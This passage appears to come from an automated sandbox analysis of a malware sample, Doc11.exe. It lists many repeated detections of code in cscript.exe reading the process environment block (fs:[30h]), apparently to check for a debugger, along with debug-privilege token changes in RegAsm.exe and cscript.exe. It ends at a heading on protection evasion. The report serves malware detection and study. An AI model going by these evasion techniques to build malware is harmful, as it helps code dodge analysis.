Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C67016 mov eax, dword ptr fs:[00000030h] 6_2_04C67016
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB4015 mov eax, dword ptr fs:[00000030h] 6_2_04CB4015
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB4015 mov eax, dword ptr fs:[00000030h] 6_2_04CB4015
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1002D mov eax, dword ptr fs:[00000030h] 6_2_04C1002D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1002D mov eax, dword ptr fs:[00000030h] 6_2_04C1002D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1002D mov eax, dword ptr fs:[00000030h] 6_2_04C1002D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1002D mov eax, dword ptr fs:[00000030h] 6_2_04C1002D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1002D mov eax, dword ptr fs:[00000030h] 6_2_04C1002D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C741E8 mov eax, dword ptr fs:[00000030h] 6_2_04C741E8
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C0C182 mov eax, dword ptr fs:[00000030h] 6_2_04C0C182
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1A185 mov eax, dword ptr fs:[00000030h] 6_2_04C1A185
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C12990 mov eax, dword ptr fs:[00000030h] 6_2_04C12990
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BEB1E1 mov eax, dword ptr fs:[00000030h] 6_2_04BEB1E1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BEB1E1 mov eax, dword ptr fs:[00000030h] 6_2_04BEB1E1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BEB1E1 mov eax, dword ptr fs:[00000030h] 6_2_04BEB1E1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C669A6 mov eax, dword ptr fs:[00000030h] 6_2_04C669A6
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C161A0 mov eax, dword ptr fs:[00000030h] 6_2_04C161A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C161A0 mov eax, dword ptr fs:[00000030h] 6_2_04C161A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA49A4 mov eax, dword ptr fs:[00000030h] 6_2_04CA49A4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA49A4 mov eax, dword ptr fs:[00000030h] 6_2_04CA49A4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA49A4 mov eax, dword ptr fs:[00000030h] 6_2_04CA49A4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA49A4 mov eax, dword ptr fs:[00000030h] 6_2_04CA49A4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C651BE mov eax, dword ptr fs:[00000030h] 6_2_04C651BE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C651BE mov eax, dword ptr fs:[00000030h] 6_2_04C651BE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C651BE mov eax, dword ptr fs:[00000030h] 6_2_04C651BE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C651BE mov eax, dword ptr fs:[00000030h] 6_2_04C651BE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C0B944 mov eax, dword ptr fs:[00000030h] 6_2_04C0B944
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C0B944 mov eax, dword ptr fs:[00000030h] 6_2_04C0B944
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BE9100 mov eax, dword ptr fs:[00000030h] 6_2_04BE9100
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BE9100 mov eax, dword ptr fs:[00000030h] 6_2_04BE9100
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BE9100 mov eax, dword ptr fs:[00000030h] 6_2_04BE9100
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BEB171 mov eax, dword ptr fs:[00000030h] 6_2_04BEB171
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BEB171 mov eax, dword ptr fs:[00000030h] 6_2_04BEB171
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BEC962 mov eax, dword ptr fs:[00000030h] 6_2_04BEC962
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C04120 mov eax, dword ptr fs:[00000030h] 6_2_04C04120
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C04120 mov eax, dword ptr fs:[00000030h] 6_2_04C04120
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C04120 mov eax, dword ptr fs:[00000030h] 6_2_04C04120
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C04120 mov eax, dword ptr fs:[00000030h] 6_2_04C04120
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C04120 mov ecx, dword ptr fs:[00000030h] 6_2_04C04120
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1513A mov eax, dword ptr fs:[00000030h] 6_2_04C1513A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1513A mov eax, dword ptr fs:[00000030h] 6_2_04C1513A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C12ACB mov eax, dword ptr fs:[00000030h] 6_2_04C12ACB
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BFAAB0 mov eax, dword ptr fs:[00000030h] 6_2_04BFAAB0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BFAAB0 mov eax, dword ptr fs:[00000030h] 6_2_04BFAAB0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BE52A5 mov eax, dword ptr fs:[00000030h] 6_2_04BE52A5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BE52A5 mov eax, dword ptr fs:[00000030h] 6_2_04BE52A5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BE52A5 mov eax, dword ptr fs:[00000030h] 6_2_04BE52A5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BE52A5 mov eax, dword ptr fs:[00000030h] 6_2_04BE52A5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BE52A5 mov eax, dword ptr fs:[00000030h] 6_2_04BE52A5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C12AE4 mov eax, dword ptr fs:[00000030h] 6_2_04C12AE4
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Doc11.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion: